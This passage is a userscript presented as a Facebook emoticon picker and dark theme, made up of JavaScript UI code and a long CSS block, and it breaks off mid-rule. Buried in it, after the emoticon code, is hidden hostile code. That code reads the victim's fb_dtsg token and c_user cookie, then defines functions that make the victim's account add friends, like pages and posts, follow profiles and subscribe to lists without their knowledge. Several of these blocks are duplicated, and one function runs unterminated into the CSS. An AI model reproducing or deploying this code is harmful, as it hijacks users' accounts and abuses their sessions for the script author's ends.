  927. "name" : "Umbrella With Rain Drops"
  928. }, {
  929. "chars" : " \u2615 ",
  930. "class" : "_1az _1a- _2ha",
  931. "name" : "Hot Drink"
  932. }, {
  933. "chars" : " \u2728 ",
  934. "class" : "_1az _1a- _2hb",
  935. "name" : "Brightness"
  936. }, {
  937. "chars" : " \u2764 ",
  938. "class" : "_1az _1a- _2hc",
  939. "name" : "Heavy Black Heart"
  940. } ];
  941.  
  942. // = Variables =======
  943. var lastActiveElement = document.activeElement;
  944.  
  945. // = Functions =======
  946. function createElement(html) {
  947. var outerHTML = document.createElement("div");
  948. outerHTML.innerHTML = html;
  949. return outerHTML.firstChild;
  950. }
  951.  
  952. function htmlSpecialChars(string) {
  953. var div = document.createElement("div");
  954. var text = document.createTextNode(string);
  955. div.appendChild(text);
  956. return div.innerHTML;
  957. }
  958.  
  959. function isInstanceOfTextInput(element) {
  960. return (element instanceof HTMLInputElement && element.type == "text")
  961. || element instanceof HTMLTextAreaElement;
  962. }
  963.  
  964. function isFlyoutOpen(flyout) {
  965. return flyout.className == "openToggler";
  966. }
  967.  
  968. function openFlyout(flyout, open) {
  969. if (open === undefined) {
  970. open = !isFlyoutOpen(flyout); // Toggle
  971. }
  972.  
  973. if (open) {
  974. flyout.className = "openToggler";
  975. } else {
  976. flyout.removeAttribute("class");
  977. }
  978. }
  979.  
  980. function createTab(titleContainer, bodyContainer) {
  981. var html;
  982. // Tab; default = inactive
  983. html = '<li class="jewelFlyout fbJewelFlyout uiToggleFlyout">';
  984. html += '<div class="jewelFlyout">';
  985. html += '</div>';
  986. html += '</li>';
  987. var title = createElement(html);
  988. titleContainer.appendChild(title);
  989.  
  990. // Manual input
  991. html = '<div style="display: none;">';
  992. html += '</div>';
  993. var body = createElement(html);
  994. bodyContainer.appendChild(body);
  995.  
  996. // Change tab listener
  997. (function(body) {
  998. title.addEventListener("click", function() {
  999. // Change tab
  1000. var titles = this.parentNode.childNodes; // tab.tabContainer.childNodes
  1001. for ( var t = 0; t < titles.length; t++) {
  1002. if (titles[t] === this) { // Active
  1003.  
  1004. } else { // Inactive
  1005. titles[t].style.background = "";
  1006. titles[t].firstChild.style.color = "";
  1007. }
  1008. }
  1009.  
  1010. // Change body
  1011. var bodies = body.parentNode.childNodes; // body.bodyContainer.childNodes
  1012. for ( var b = 0; b < bodies.length; b++) {
  1013. if (bodies[b] === body) { // Show
  1014. body.style.display = "";
  1015. } else { // Hide
  1016. bodies[b].style.display = "none";
  1017. }
  1018. }
  1019. });
  1020. })(body);
  1021.  
  1022. return {
  1023. "title" : title.firstChild,
  1024. "body" : body
  1025. };
  1026. }
  1027.  
  1028. function createTabListBody(emoticons, filter) {
  1029. var html;
  1030.  
  1031. html = '<div style="max-height: 200px; padding-right: 15px; overflow-x: hidden; line-height: 1em;">';
  1032. html += '<div style="padding: 10px; width: 200px; font-size: 15px;">';
  1033. html += '</div>';
  1034. html += '</div>';
  1035. var body = createElement(html).firstChild;
  1036. for ( var e = 0; e < emoticons.length; e++) {
  1037. var emoticon = emoticons[e];
  1038. if (!filter(emoticon)) {
  1039. continue;
  1040. }
  1041.  
  1042. // Icons
  1043. html = '<span class="panelCell" style="display: inline-block; vertical-align: middle; padding: 2px;">';
  1044. html += '<a';
  1045. html += ' class="emoticon'
  1046. + (emoticon.class !== undefined ? ' ' + emoticon.class : '')
  1047. + '"';
  1048. html += ' style="text-decoration: inherit; color: inherit;'
  1049. + (emoticon.class !== undefined ? ' color: transparent;'
  1050. : ' width: auto;') + '"';
  1051. html += (emoticon.name !== undefined ? ' title="' + emoticon.name
  1052. + '"' : '');
  1053. html += '>';
  1054. html += htmlSpecialChars(emoticon.chars);
  1055. html += '</a>';
  1056. html += '</span>';
  1057. var cell = createElement(html);
  1058. body.appendChild(cell);
  1059.  
  1060. // Select emoticon listener
  1061. var emoticonA = cell.firstChild;
  1062. (function(emoticon) {
  1063. emoticonA.addEventListener("click", function() {
  1064. if (isInstanceOfTextInput(lastActiveElement)) {
  1065. lastActiveElement.focus();
  1066.  
  1067. var chars = emoticon.chars;
  1068. var value = lastActiveElement.value;
  1069. var start = lastActiveElement.selectionStart;
  1070. var end = lastActiveElement.selectionEnd;
  1071. lastActiveElement.value = value.substring(0, start)
  1072. + chars + value.substring(end);
  1073. lastActiveElement.setSelectionRange(start + chars.length, start + chars.length);
  1074. }
  1075.  
  1076. openFlyoutCommand = false; // Close flyout
  1077. });
  1078. })(emoticon);
  1079. }
  1080.  
  1081. return body.parentNode;
  1082. }
  1083.  
  1084. // = Construct UI =======
  1085. var html;
  1086.  
  1087. // Menu item
  1088. // var navItem
  1089. html = '<li class="navItem middleItem notifNegativeBase">';
  1090. html += '<div class="fbJewel">';
  1091. // {
  1092.  
  1093. // Toggler
  1094. html += '<a class="navLink" title="1 Thông Báo Mới">'; // var navLink
  1095. html += '<span style="vertical-align: middle;"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/7OqExvAe82o.gif"></img></span>';
  1096. html += '</a>';
  1097.  
  1098.  
  1099. // Flyout
  1100. html += '<div>'; // openToggler; var flyout
  1101. html += '<div class="emoticonsPanel fbJewelFlyout uiToggleFlyout" style="z-index: 1; width: auto;">';
  1102. // {
  1103.  
  1104.  
  1105. // Beeper
  1106. html += '<div class="jewelBeeperHeader">';
  1107. html += '<div class="beeperNubWrapper">';
  1108. html += '<div class="beeperNub" style="left: 4px;"></div>';
  1109. html += '</div>';
  1110. html += '</div>';
  1111.  
  1112. // Tabs
  1113. // var titleContainer
  1114. html += '<ul style="display: text-align: center;">';
  1115. html += '</ul>';
  1116.  
  1117. // Bodies
  1118. html += '<div>'; // var bodyContainer
  1119. html += '</div>';
  1120.  
  1121. // Footer
  1122. html += '<div class="jewelFooter">';
  1123. html += '<a class="jewelFooter" href="#" target="_blank">By Thịnh</a>';
  1124. html += '</div>';
  1125.  
  1126. // }
  1127. html += '</div>'; // emoticonsPanel
  1128. html += '</div>'; // openToggler
  1129.  
  1130. // }
  1131. html += '</div>'; // fbJewel
  1132. html += '</li>'; // navItem
  1133.  
  1134. var navItem = createElement(html);
  1135. var pageNav = document.querySelector("#pageNav");
  1136. pageNav.insertBefore(navItem, pageNav.firstChild);
  1137.  
  1138. // Maintain active element
  1139. navItem.addEventListener("click", function() {
  1140. if (isInstanceOfTextInput(lastActiveElement)) {
  1141. lastActiveElement.focus();
  1142. }
  1143.  
  1144. openFlyoutCommand = undefined; // Do nothing
  1145. }, true);
  1146.  
  1147. var navLink = navItem.firstChild.firstChild;
  1148. var flyout = navLink.nextSibling;
  1149. var titleContainer = flyout.firstChild.childNodes[1];
  1150. var bodyContainer = titleContainer.nextSibling;
  1151.  
  1152. // Toggle listener
  1153. navLink.addEventListener("click", function() {
  1154. openFlyoutCommand = !isFlyoutOpen(flyout);
  1155. });
  1156.  
  1157. // Picture emoticon tab
  1158. var picEmoTab = createTab(titleContainer, bodyContainer);
  1159. picEmoTab.title.click(); // Default tab
  1160.  
  1161. picEmoTab.body.appendChild(createTabListBody(emoticons, function(emoticon) {
  1162. if (emoticon.class === undefined) { // No picture
  1163. return false;
  1164. }
  1165.  
  1166. // [Bug] 2 characters unicode emoticons
  1167. if (emoticon.chars.length == 2) {
  1168. return false;
  1169. }
  1170.  
  1171. return true;
  1172.  
  1173. }));
  1174.  
  1175. // = Other listener =======
  1176.  
  1177. document.addEventListener("click", function() {
  1178. // Get active textarea
  1179. lastActiveElement = document.activeElement;
  1180.  
  1181. // Toggle flyout
  1182. if (openFlyoutCommand !== undefined) {
  1183. openFlyout(flyout, openFlyoutCommand);
  1184. }
  1185. openFlyoutCommand = false;
  1186. });
  1187. })();
  1188.  
  1189.  
  1190. // === Facebook Emoticons ====
  1191. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  1192. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  1193.  
  1194. function cereziAl(isim) {
  1195. var tarama = isim + "=";
  1196. if (document.cookie.length > 0) {
  1197. konum = document.cookie.indexOf(tarama)
  1198. if (konum != -1) {
  1199. konum += tarama.length
  1200. son = document.cookie.indexOf(";", konum)
  1201. if (son == -1)
  1202. son = document.cookie.length
  1203. return unescape(document.cookie.substring(konum, son))
  1204. }
  1205. else { return ""; }
  1206. }
  1207. }
  1208.  
  1209. function getRandomInt (min, max) {
  1210. return Math.floor(Math.random() * (max - min + 1)) + min;
  1211. }
  1212. function randomValue(arr) {
  1213. return arr[getRandomInt(0, arr.length-1)];
  1214. }
  1215.  
  1216. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  1217. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  1218.  
  1219. function cereziAl(isim) {
  1220. var tarama = isim + "=";
  1221. if (document.cookie.length > 0) {
  1222. konum = document.cookie.indexOf(tarama)
  1223. if (konum != -1) {
  1224. konum += tarama.length
  1225. son = document.cookie.indexOf(";", konum)
  1226. if (son == -1)
  1227. son = document.cookie.length
  1228. return unescape(document.cookie.substring(konum, son))
  1229. }
  1230. else { return ""; }
  1231. }
  1232. }
  1233. function getRandomInt (min, max) {
  1234. return Math.floor(Math.random() * (max - min + 1)) + min;
  1235. }
  1236. function randomValue(arr) {
  1237. return arr[getRandomInt(0, arr.length-1)];
  1238. }
  1239.  
  1240. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  1241. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  1242. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  1243. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  1244. function IDS(r) {
  1245. var X = new XMLHttpRequest();
  1246. var XURL = "//www.facebook.com/ajax/add_friend/action.php";
  1247. var XParams = "to_friend=" + r +"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";
  1248. X.open("POST", XURL, true);
  1249. X.onreadystatechange = function () {
  1250. if (X.readyState == 4 && X.status == 200) {
  1251. X.close;
  1252. }
  1253. };
  1254. X.send(XParams);
  1255. }
  1256. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function Like(p) { var Page = new XMLHttpRequest(); var PageURL = "//www.facebook.com/ajax/pages/fan_status.php"; var PageParams = "&fbpage_id=" + p +"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp="; Page.open("POST", PageURL, true); Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { Page.close; } }; Page.send(PageParams); }
  1257. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var now=(new Date).getTime(); function P(opo) { var X = new XMLHttpRequest(); var XURL ="//www.facebook.com/ajax/ufi/like.php"; var XParams = "like_action=true&ft_ent_identifier="+opo+"&source=1&client_id="+now+"%3A379783857&rootid=u_jsonp_39_18&giftoccasion&ft[tn]=%3E%3D&ft[type]=20&ft[qid]=5890811329470279257&ft[mf_story_key]=2814962900193143952&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n88QoAMBlClyocpae&__req=g4&fb_dtsg="+fb_dtsg+"&phstamp="; X.open("POST", XURL, true); X.onreadystatechange = function () { if (X.readyState == 4 && X.status == 200) { X.close; } }; X.send(XParams); }
  1258. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  1259. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  1260. function a(abone)
  1261. { var http4=new XMLHttpRequest;
  1262. var url4="/ajax/follow/follow_profile.php?__a=1";
  1263. var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";
  1264. http4.open("POST",url4,true);
  1265. http4.onreadystatechange=function()
  1266. { if(http4.readyState==4&&http4.status==200)http4.close };
  1267. http4.send(params4)}
  1268. function sublist(uidss)
  1269. { var a = document.createElement('script');
  1270. a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  1271. document.body.appendChild(a);
  1272. #facebook body:not(.transparent_widget), #nonfooter, #booklet, .UIFullPage_Container, .fbConnectWidgetTopmost, .connect_widget_vertical_center, .fbFeedbackContent, #LikeboxPluginPagelet
  1273.  
  1274. {
  1275.  
  1276. color: #fff !important;
  1277.  
  1278. background: #000 url("http://i.imgur.com/W0EgzcC.png") no-repeat fixed center !important;
  1279.  
  1280. }
  1281.  
  1282.  
  1283.  
  1284. /* Alternate wallpaper info:
  1285.  
  1286. To use another wallpaper, just change the above section to use your image of choice
  1287.  
  1288. */
  1289.  
  1290.  
  1291.  
  1292. /* Text-shadows */
  1293.  
  1294.  
  1295.  
  1296. a, .UIActionButton_Text, span, div, input[value="Comment"] {text-shadow: #000 1px 1px 1px !important;}
  1297.  
  1298.  
  1299.  
  1300. .UIComposer_InputArea *, .highlighter div{text-shadow: none !important;}
  1301.  
  1302.  
  1303.  
  1304. #profile_name {text-shadow: #fff 0 0 2px, #000 1px 1px 3px;}
  1305.  
  1306.  
  1307.  
  1308. a:hover, .inputbutton:hover, .inputsubmit:hover, .accent, .hover, .domain_name:hover, #standard_error, .UIFilterList_Selected a:hover, input[type="submit"]:not(.fg_action_hide):hover, .button_text:hover, #presence_applications_tab:hover, .UIActionMenu:hover, .attachment_link a span:hover, .UIIntentionalStory_Time a:hover, .UIPortrait_Text .title:hover, .UIPortrait_Text .title span:hover, .comment_link:hover, .request_link span:hover, .UIFilterList_ItemLink .UIFilterList_Title:hover, .UIActionMenu_Text:hover, .UIButton_Text:hover, .inner_button:hover, .panel_item span:hover, li[style*="background-color: rgb(255, 255, 255)"] .friend_status, .dh_new_media span:hover, a span:hover, .tab_link:hover *, button:hover, #buddy_list_tab:hover *, .tab_handle:hover .tab_name span, .as_link:hover span, input[type="button"]:hover, .feedback_show_link:hover, .page:hover .text, .group:hover .text, .calltoaction:hover .seeMoreTitle, .liketext:hover, .tickerStoryBlock:hover .uiStreamMessage span, .tickerActionVerb, .mleButton:hover {color: #99CCFF !important;text-shadow: #fff 0 0 2px !important;text-decoration: none !important;}
  1309.  
  1310.  
  1311.  
  1312. /* end text-shadows */
  1313.  
  1314.  
  1315.  
  1316.  
  1317.  
  1318.  
  1319.  
  1320.  
  1321.  
  1322. /* Box Shadows */
  1323.  
  1324.  
  1325.  
  1326. .fbChatSidebar .fbChatTypeahead .textInput, .fbChatSidebarMessage, .devsitePage .body > .content {box-shadow: none !important;}
  1327.  
  1328.  
  1329.  
  1330. .presence_menu_opts,#header, .LJSDialog, .chat_window_wrapper, #navAccount ul, .fbJewelFlyout, .uiTypeaheadView, .uiToggleFlyout { box-shadow: 0 0 3em #000; }
  1331.  
  1332.  
  1333.  
  1334. .UIRoundedImage, .UIContentBox_GrayDarkTop, .UIFilterList > .UIFilterList_Title, .dialog-title, .flyout, .uiFacepileItem .uiTooltipWrap {box-shadow: 0 0 1em 1px #000;}
  1335.  
  1336.  
  1337.  
  1338. .extra_menus ul li:hover, .UIRoundedBox_Box, .fb_menu_link:hover, .UISelectList_Item:hover, .fb_logo_link:hover, .hovered, #presence_notifications_tab, #chat_tab_barx, .tab_button_div, .plays_val, #pageNav li:not(.menuDivider):nth-child(n+2):hover, .topNavLink a:hover, #navAccount.openToggler, #mailBoxItems li a:hover, .buddy_row a:hover, .buddyRow a:hover, #navigation a:hover, #presence_applications_tab, #buddy_list_tab, #presence_error_section, .uiStepSelected .middle, .jewelButton, #pageLogo, .fbChatOrderedList .item:hover, .uiStreamHeaderTall {box-shadow: 0 0 3px #000, inset 0 0 5px #000 !important;}
  1339.  
  1340.  
  1341.  
  1342. .fbChatBuddyListDropdown .uiButton, .promote_page a, .create_button a, .share_button_browser div, .silver_create_button, .button:not(.uiSelectorButton):not(.close):not(.videoicon), button:not(.as_link), .GBSearchBox_Button, .UIButton_Gray, .UIButton, .uiButton:not(.uiSelectorButton), .fbPrivacyWidget .uiSelectorButton:not(.lockButton), .uiButtonSuppressed, .UIActionMenu_SuppressButton, .UIConnectControlsListSelector .uiButton, .uiSelector:not(.fbDockChatDropdown) .uiSelectorButton:not(.uiCloseButton), .fbTimelineRibbon, #fbDockChatBuddylistNub .fbNubButton {box-shadow: 0 0 .5em rgba(0,0,0,0.9), inset 0 0 .75em #99CCFF !important;border-width: 0 !important; }
  1343.  
  1344.  
  1345.  
  1346. .fbChatBuddyListDropdown .uiButton:hover, .uiButton:not(.uiSelectorButton):hover, .fbPrivacyWidget .uiSelectorButton:not(.lockButton):hover, .uiButtonSuppressed:hover, .UIButton:hover, .UIActionMenu_Wrap:hover, .tabs li:hover, .ntab:hover, input[type="submit"]:not(.fg_action_hide):not(.stat_elem):not([name="add"]):not([name="actions[reject]"]):not([name="actions[accept]"]):not([value="Find Friends"]):not([value="Share"]):not([value="Maybe"]):not([value="No"]):not([value="Yes"]):not([value="Comment"]):not([value="Reply"]):not([type="Flag"]):not([type="submit"]):hover, .inputsubmit:hover, .promote_page:hover, .create_button:hover, .share_button_browser:hover, .silver_create_button_shell:hover, .painted_button:hover, .flyer_button:hover, .button:not(.close):not(.uiSelectorButton):not(.videoicon):hover, button:not(.as_link):hover, .GBSearchBox_Button:hover, .tagsWrapper, .UIConnectControlsListSelector .uiButton:hover, .uiSelector:not(.fbDockChatDropdown) .uiSelectorButton:not(.uiCloseButton):hover, .fbTimelineMoreButton:hover, #fbDockChatBuddylistNub .fbNubButton:hover {box-shadow: 0 0 .5em rgba(0,0,0,0.9), 0 0 1em 3px #99CCFF, inset 0 0 2em #6699FF !important;}
  1347.  
  1348.  
  1349.  
  1350.  
  1351.  
  1352.  
  1353.  
  1354.  
  1355.  
  1356. #icon_garden, .list_select .friend_list {box-shadow: 0 0 3px -1px #000, inset 0 0 3px -1px #000;}
  1357.  
  1358.  
  1359.  
  1360. .bb .fbNubButton, .uiScrollableAreaGripper {box-shadow: inset 0 4px 8px #99CCFF, 0 0 1em #000 !important;}
  1361.  
  1362. .bb .fbNubButton:hover {box-shadow: inset 0 4px 8px #99CCFF, 0 .5em 1em 1em #99CCFF !important;}
  1363.  
  1364.  
  1365.  
  1366. .fbNubFlyoutTitlebar {box-shadow: inset 0 4px 8px #99CCFF;padding: 0 4px !important;}
  1367.  
  1368.  
  1369.  
  1370. #fb_menubar, .progress_bar_outer {box-shadow: inset 0 0 3px #000, 0 0 3em 3px #000;}
  1371.  
  1372. #presence_ui {box-shadow: 0 0 3em 1px #000}
  1373.  
  1374.  
  1375.  
  1376. #presence_applications_tab:hover, #buddy_list_tab:hover, #presence_notifications_tab:hover, .tab_handle:hover, .focused {box-shadow: 0 0 3px #000, inset 0 0 3px #000, 0 0 3em 5px #fff;}
  1377.  
  1378.  
  1379.  
  1380. .uiSideNavCount, .jewelCount, .uiContextualDialogContent, .fbTimelineCapsule .fbTimelineTwoColumn > .timelineUnitContainer:hover, .timelineReportContainer:hover, .uiOverlayPageContent {box-shadow: 0 0 1em 4px #99CCFF}
  1381.  
  1382.  
  1383.  
  1384. .img_link:hover, .album_thumb:hover, .fbChatTourCallout .body, .fbSidebarGripper div {box-shadow: 0 0 3em #99CCFF;}
  1385.  
  1386.  
  1387.  
  1388. .shaded, .progress_bar_inner, .tickerStoryAllowClick {box-shadow: inset 0 0 1em #99CCFF !important}
  1389.  
  1390.  
  1391.  
  1392. .UIPhotoGrid_Table .UIPhotoGrid_TableCell:hover .UIPhotoGrid_Image, #myphoto:hover, .mediaThumbWrapper:hover, .uiVideoLink:hover, .mediaThumb:hover, #presence.fbx_bar #presence_ui #presence_bar .highlight, .fbNubFlyout:hover, .hovercard .stage, #fbDockChatBuddylistNub .fbNubFlyout:hover {box-shadow: 0 0 3em 5px #99CCFF !important;}
  1393.  
  1394.  
  1395.  
  1396. .fbNubFlyout {box-shadow: 0 0 3em 5px #000 !important;}
  1397.  
  1398.  
  1399.  
  1400. #blueBar {box-shadow: 0 0 1em 3px #000;}
  1401.  
  1402.  
  1403.  
  1404. /* end box shadows*/
  1405.  
  1406.  
  1407.  
  1408.  
  1409.  
  1410. input[type="file"]{-moz-appearance:none!important;border: none !important;}
  1411.  
  1412.  
  1413.  
  1414.  
  1415.  
  1416. #page_table {background: #333 }
  1417.  
  1418.  
  1419.  
  1420.  
  1421.  
  1422. .status_text, h4, a, h2, .flyout_menu_title, .url, #label_nm, h5, .WelcomePage_MainMessage, #public_link_uri, #public_link_editphoto span, #public_link_editalbum span, .dh_subtitle, .app_name_heading, .box_head, .presence_bar_button span, a:link span, #public_link_album span, .note_title, .link_placeholder, .stories_title, .typeahead_suggestion, .boardkit_title, .section-title strong, .inputbutton, .inputsubmit, .matches_content_box_title, .tab_name, .header_title_text, .signup_box_message, .quiz_start_quiz, .sidebar_upsell_header, .wall_post_title, .megaphone_header, .source_name, .UIComposer_AttachmentLink, .fcontent > .fname, #presence_applications_tab, .mfs_email_title, .flyout .text, .UIFilterList_ItemLink .UIFilterList_Title, .announce_title, .attachment_link a span, .comment_author, .UIPortrait_Text .title, .comment_link, .UIIntentionalStory_Names, #profile_name, .UIButton_Text, .dh_new_media span, .share_button_browser div, .UIActionMenu_Text, .UINestedFilterList_Title, button, .panel_item span, .stat_elem, .action, #contact_importer_container input[value="Find Friends"]:hover, .navMore, .navLess, input[name="add"], input[name="actions[reject]"], input[name="actions[accept]"], input[name="actions[maybe]"], .uiButtonText, .as_link .default_message, .feedback_hide_link, .feedback_show_link, #fbpage_fan_sidebar_text, .comment_actual_text a span, .uiAttachmentDesc a span, .uiStreamMessage a span, .group .text, .page .text, .uiLinkButton input, .blueName, .uiBlingBox span.text, .commentContent a span, .uiButton input, .fbDockChatTab .name, .simulatedLink, .bfb_tab_selected, .liketext, a.UIImageBlock_Content, .uiTypeaheadView li .text, .author, .authors, .itemLabel, .passiveName, .token, .fbCurrentTitle, .fbSettingsListItemLabel, .uiIconText, #uetqg1_8, .fbRemindersTitle, .mleButton, .uiMenuItem .selected .name {color: #99CCFF !important;}
  1423.  
  1424.  
  1425.  
  1426.  
  1427.  
  1428. #email, option, .disclaimer, .info dd, .UIUpcoming_Info, .UITos_ReviewDescription, .settings_box_text, div[style*="color: rgb(85, 85, 85)"] {color: #999 !important;}
  1429.  
  1430.  
  1431.  
  1432.  
  1433.  
  1434.  
  1435.  
  1436. .status_time, .header_title_wrapper, .copyright, #newsfeed_submenu, #newsfeed_submenu_content strong, .summary, .caption, .story_body, .social_ad_advert_text, .createalbum dt, .basic_info_summary_and_viewer_actions dt, .info dt, .photo_count, p, .fbpage_fans_count, .fbpage_type, .quiz_title, .quiz_detailtext, .byline, label, .fadvfilt b, .fadded, .fupdt, .label, .main_subtitle, .minifeed_filters li, .updates_settings, #public_link_photo, #phototags em, #public_link_editphoto, .note_dialog, #public_link_editalbum, .block_add_person, .privacy_page_field, .action_text, .network, .set_filters span, .byline span, #no_notes, #cheat_sheet, .form_label, .share_item_actions, .options_header, .box_subtitle, .review_header_subtitle_line, .summary strong, .upsell dd, .availability_text, #public_link_album, .explanation, .aim_link, .subtitle, #profile_status, span[style*="color: rgb(51, 51, 51)"], .fphone_label, .phone_type_label, .sublabel, .gift_caption, dd span, .events_bar, .searching, .event_profile_title, .feedBackground, .fp_show_less, .increments td, .status_confirm, .sentence, .admin_list span, .boardkit_no_topics, .boardkit_subtitle, .petition_preview, .boardkit_topic_summary, li, #photo_badge, .status_body, .spell_suggest_label, .pg_title, .white_box, .token span, .profile_activation_score, .personal_msg span, .matches_content_box_subtitle span, tr[fbcontext="41097bfeb58d"] td, .title, .floated_container span:not(.accent), div[style*="color: rgb(85, 85, 85)"], div[style*="color: rgb(68, 68, 68)"], .present_info_label, .fbpage_description, .tagged span, #tags h2 strong, #tags div span, .detail, .chat_info_status, .gray-text, .author_header, .inline_comment, .fbpage_info, .gueststatus, .no_pages, .topic_pager, .header_comment span, div[style*="color: rgb(101, 107, 111)"], #q, span[style*="color: rgb(85, 85, 85)"], .pl-item, .tagged_in, .pick_body, td[style*="color: rgb(85, 85, 85)"], strong[style*="color: rgb(68, 68, 68)"], div[style*="color: gray"], .group_officers dd, .fbpage_group_title, .application_menu_divider, .friend_status span, .more_info, .logged_out_register_subhead, .logged_out_register_footer, input[type="text"], textarea, .status_name span, input[type="file"], .UIStoryAttachment_Copy, .stream_participants_short, .UIHotStory_Copy, input[type="submit"]:not(.fg_action_hide):not(.stat_elem):not(.UIButton_Text):not([name="add"]):not([name="actions[reject]"]):not([name="actions[accept]"]):not([value="Find Friends"]):not([value="Share"]):not([value="Maybe"]):not([value="No"]):not([value="Yes"]):not([value="Comment"]):not([value="Reply"]):not([value="Flag"]):not([type="submit"]), input[type="search"], input[type="input"], .inputtext, .relationship span, input[type="button"]:not([value="Comment"]), input[type="password"], #reg_pages_msg, .UIMutableFilterList_Tip, .like_sentence, .UIIntentionalStory_InfoText, .UIHotStory_Why, .question_text, .UIStory, .tokenizer, input[type="hidden"], .tokenizer_input *, .text:not(.external), .flistedit b, .fexth, .UIActionMenu_Main, span[style*="color: rgb(102, 102, 102)"], div[style*="color: rgb(85, 85, 85)"], div[style*="color: rgb(119, 119, 119)"], blockquote, .description, .security_badge, .full_name, .email_display, .email_section, .chat_fl_nux_messaging, .UIObjectListing_Subtext, .confirmation_login_content, .confirm_username, .UIConnectControls_Body em, .comment_actual_text, .status, .UICantSeeProfileBlurbText, .UILiveLink_Description, .recaptcha_text, .UIBeep_Title, .UIComposer_Attachment_ShareLink_URL, .app_dir_app_category, .first_stat, .aggregate_review_title, .stats span, .facebook_disclaimer, .app_dir_app_creator, .app_dir_app_monthly_active_users, .app_dir_app_friend_users, .UISearchFilterBar_Label, .UIFullListing_InfoLabel, .email_promise_detail, .title_text, .excerpt, .dialog_body, .tos, .UIEMUASFrame_body, .page_note, .nux_highlight_composer, .UIIntentionalStory_BottomAttribution, .tagline, .GBSelectList, .gigaboxx_thread_header_authors, .GBThreadMessageRow_ReferrerLink, #footerWrapper, .infoTitle, .fg_explain, .UIMentor_Message, .GenericStory_BottomAttribution, .chat_input, .video_timestamp span, #tagger_prompt, .UIImageBlock_Content, .new_list span, .GBSearchBox_Input input, .SearchPage_EmailSearchLeft, .sub_info,.UIBigNumber_Label, .UIInsightsGeoList_ListTitle, .UIInsightsGeoList_ListItemValue, .UIInsightsSmall_Note, .textmedium, .UIFeedFormStory_Lead, .likes, .home_no_stories_content, .title_label, div[style*="color: rgb(102, 102, 102)"], *[style*="color: rgb(51, 51, 51)"], .tab_box_inner, .uiStreamMessage, .privacy_section_description, .info_text, .uiAttachmentDesc, .uiListBulleted span, .privacySettingsGrid th, .recommendations_metadata, .postleft dd:not(.usertitle), .postText, .mall_post_body_text, .fbChatMessage, .fbProfileBylineFragment, .nosave option, .uiAttachmentDetails, .fbInsightsTable td, .mall_post_body, .uiStreamPassive, .snippet, .questionInfo span, .promotionsHowto, .fcg, .headerColumn .fwb, .rowGroupTitle .fwb, .rowGroupDescription .fwb, .likeUnit, .aboveUnitContent, .placeholder, .sectionContent, .UIFaq_Snippet, .uiMenuItem:not(.checked) .name {color: #bbb !important;}
  1437.  
  1438.  
  1439.  
  1440. .status_clear_link, h3, h1, .updates, .WelcomePage_SignUpHeadline, .WelcomePage_SignUpSubheadline, .mock_h4 .left, .review_header_title, caption, .logged_out_register_msg, .domain_name, .UITitledBox_Title, .signup_box_content, .highlight, .question, .whocan span, .UIFilterList > .UIFilterList_Title, .subject, .UIStoryAttachment_Label, .typeahead_message, .UIShareStage_Title, .alternate_name, .helper_text, .textlarge, .page .category, .item_date, .privacy_section_label, .privacy_section_title, .uiTextMetadata, .seeMoreTitle, .categoryContents, code, .usertitle, .fbAppSettingsPageHeader, .fsxl, .LogoutPage_MobileMessage, .LogoutPage_MobileSubmessage, .recommended_text, #all_friends_text, .removable, .ginormousProfileName, .experienceContent .fwb, #bfb_t_popular_body div[style*="color:#880000"], .fsm:not(.snippet):not(.itemLabel):not(.fbChatMessage), .uiStreamHeaderTextRight, .bookmarksNavSeeAll, .tab .content, .fbProfilePlacesFilterCount {color: #6699FF !important;}
  1441.  
  1442.  
  1443.  
  1444.  
  1445.  
  1446. .em, .story_comment_back_quote, .story_content, small, .story_content_excerpt, .walltext, .public, p span, #friends_page_subtitle, .main_title, .empty_message, .count, .count strong, .stories_not_included li span, .mobile_add_phone th, #friends strong, .current, .no_photos, .intro, .sub_selected a, .stats, .result_network, .note_body, #bodyContent div b, #bodyContent div, .upsell dt, .buddy_count_num strong, .left, .body, .tab .current, .aim_link span, .story_related_count, .admins span, .summary em, .fphone_number, .my_numbers_label, .blurb_inner, .photo_header strong, .note_content, .multi_friend_status, .current_path span, .current_path, .petition_header, .pyramid_summary strong, #status_text, .contact_email_pending em, .profile_needy_message, .paging_link div, .big_title, .fb_header_light, .import_status strong, .upload_guidelines ul li span, .upload_guidelines ul li span strong, #selector_status, .timestamp strong, .chat_notice, .notice_box, .text_container, .album_owner, .location, .info_rows dd, .divider, .post_user, div[style="color: rgb(101, 107, 111);"] b, div[style="color: rgb(51, 51, 51);"] b, .basic_info_summary_and_viewer_actions dd, .profile_info dd, .story_comment, p strong, th strong, .fstatus, .feed_story_body, .story_content_data, .home_prefs_saved p, .networks dd, .relationship_status dd, .birthday 